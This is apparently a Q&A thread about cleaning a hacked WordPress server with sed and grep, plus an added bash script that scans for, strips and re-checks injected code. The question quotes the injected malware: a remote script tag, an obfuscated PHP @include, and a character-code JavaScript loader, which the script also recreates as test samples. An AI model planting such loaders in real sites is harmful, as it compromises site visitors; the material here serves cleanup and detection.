
How to replace whole string using sed or possibly grep

Tags: grep, bash, shell, sed

So my whole server got hacked or got a malware problem. My site is based on WordPress, and the majority of sites hosted on my server are WordPress based. The hacker added this line of code to every single file and in the database:

<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>

I did search it via grep using

grep -r "trasnaltemyrecords" /var/www/html/{*,.*}

I'm trying to replace it throughout the file structure with sed and I've written the following command.

sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php

I'm trying to replace the string on a single file, index.php, first, so I know it works.

And I know my code is wrong. Please help me with this.

I tried @Eran's code and it deleted the whole line, which is good and as expected. However, the total jargon is this:

/*ee8fa*/

@include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";

/*ee8fa*/

And while I wish to delete all the content, I wish to keep the php opening tag <?php.

Though @slybloty's solution is easy and it worked.

So, to remove the code fully from all the affected files, I'm running the following 3 commands. Thanks to all of you for this.

  1. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" - To Remove the script line
  2. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d' - To remove the @include line
  3. find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d' - To remove the comment line

Also, I ran all 3 commands again for '*.html', because the hacker's script created unwanted index.html in all the directories. I was not sure if deleting these index.html in bulk is the right approach.

Now, I still need to figure out the junk files and traces of it.

The hacker script added the JS code as well.

var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Trying to see if I can sed it as well.

Dilip Gupta asked Nov 07 '19 15:11



1 Answer

Use double quotes (") for the string and don't escape the single quotes (') nor the tags (<>). Only escape the slashes (/).

sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
slybloty answered Nov 09 '22 04:11
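Going beyond the single sed command in the answer, the following added example (not code from the question or the answer) cleans a whole tree and then re-scans it. It matches the script tag for any subid, because the String.fromCharCode loader in the question decodes to the same talk.js URL with subid=060, and it also searches for the character-code form that a plain grep for the domain name misses. The function names, the sample files and subid=999 are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example. The sample files built below are constructed, not from a real host.

# Character codes for "trasnaltemyrecords", as used by the String.fromCharCode() loader.
CODES='116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115'

# List files that still contain any indicator from the post (backups are skipped).
scan_tree() {
  grep -rlE --exclude='*.bak' \
    -e 'trasnaltemyrecords' -e "$CODES" -e '\\057va' "$1" || true
}

# Strip the script tag (any subid), the marker comment and the @include text in place.
# Substitution (not line deletion) keeps "<?php" even when it shares a line with them.
# '#' is the sed delimiter, so the slashes in the URL need no escaping.
clean_tree() {
  find "$1" -type f \( -name '*.php' -o -name '*.html' \) -exec sed -E -i.bak \
    -e 's#<script[^>]*scripts\.trasnaltemyrecords\.com/talk\.js[^>]*></script>##g' \
    -e 's#/\*ee8fa\*/##g' \
    -e 's#@include "\\057va[^"]*";##g' {} +
}

# Build a small constructed tree: one PHP file, one HTML file, one JS loader.
make_sample() {
  dir=$(mktemp -d)
  printf '%s\n' '<?php /*ee8fa*/' \
    '@include "\057va\162/w\167w/example.i\143o";' \
    '/*ee8fa*/' 'echo "hello";' > "$dir/index.php"
  printf '%s\n' "<p>ok</p><script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=999'></script>" > "$dir/page.html"
  printf '%s\n' "var pl = String.fromCharCode(104,$CODES,46); s.src=pl;" > "$dir/app.js"
  printf '%s\n' "$dir"
}

# Run as "script.sh demo" to see the scan before and after cleaning.
if [ "${1:-}" = demo ]; then
  dir=$(make_sample)
  echo "before:"; scan_tree "$dir"
  clean_tree "$dir"
  echo "after (needs manual review):"; scan_tree "$dir"
fi
```

The `.bak` copies still contain the injected code, so move them out of the web root once the result is verified. Files that `scan_tree` still lists after cleaning, such as the JavaScript loader, need manual review.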